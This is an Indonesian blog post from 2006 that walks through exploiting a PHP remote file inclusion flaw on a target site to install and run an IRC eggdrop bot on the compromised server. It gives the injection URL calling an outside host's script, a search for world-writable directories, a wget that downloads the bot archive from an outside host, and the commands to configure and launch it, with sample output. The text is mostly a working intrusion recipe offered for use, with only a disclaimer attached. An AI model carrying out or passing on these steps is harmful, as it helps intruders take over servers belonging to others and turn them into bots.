Sunday, February 12, 2006

Membuat Eggdrop lewat PhpInjection

Pada artikel saya yang terakhir saya menulis tentang bagaimana melakukan Injection lewat script php.Pada kesempatan ini kita akan membuat Eggdrop pada PhpInjection yang kita buat.
Nah mending kita langsung ajah. Nah kamu tinggal masukkin dech di address bar:

http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd

1. Kamu cari folder mana yang bisa kamu masuki dengan cara find /-perm 777 -type d
Atau kalo nggak mau repot langsung aja kamu wget di /var/tmp atau /tmp

2. Nah wget dech bot nya di :

ketik : wget http://www.geocities.com/k4k3_rgb/bot/linux.tgz

3. nah setelah itu kamu ekstrak :

ketik : tar -zxvf linux.tgz
misal : [januar@server tmp]$ tar -zxvf linux.tgz

4. Abis itu masuk dech ke directory .linux. Nah setelah berada pada directory .linux kamu ketik :

[januar@server .linux]$ ./nadya

maka akan keluar command seperti berikut :

Cara Penggunaan :

./nadya pr1 pr2 pr3 pr4 pr5 pr6

pr1 = nama file conf yg akan dibuat
pr2 = nick
pr3 = ident
pr4 = IP
pr5 = nama channel (jangan pake #)
pr6 = nick owner

[januar@server .linux]$

Nah bikin dech bot sesuai keinginan kmu.
Contoh : ./nadya botk4k3 botk4k3 CrewK4k3 (ip tuh server) hackcrew k4k3

[januar@server .linux]$ ./nadya botk4k3 botk4k3 hackcrew 192.168.21.21 hackcrew k4k3

5. Nah setelah keluar perintah berikut :

Config file : botk4k3
set nick "botk4k3"
set username "hackcrew"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set basechan "#hackcrew"
set owner "k4k3"
cat: kinana.conf: No such file or directory

ketik: ./eggdrop -m botk4k3 untuk menjalankan bot anda

Thanks to k4k3 for his idea, You Are My Teacher !!!

maka ketikanlah :
./eggdrop -m botk4k3

contoh : [januar@server .linux]$ ./eggdrop -m botk4k3

6. Nah selesai dech bikin botnya.Kamu tinggal tunggu dech di channel kmu. Trus sapa dech botnya.
ketik: /msg botk4k3 hello

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Sumber : http://semparuk.mynew.ws/news.php
Post a Comment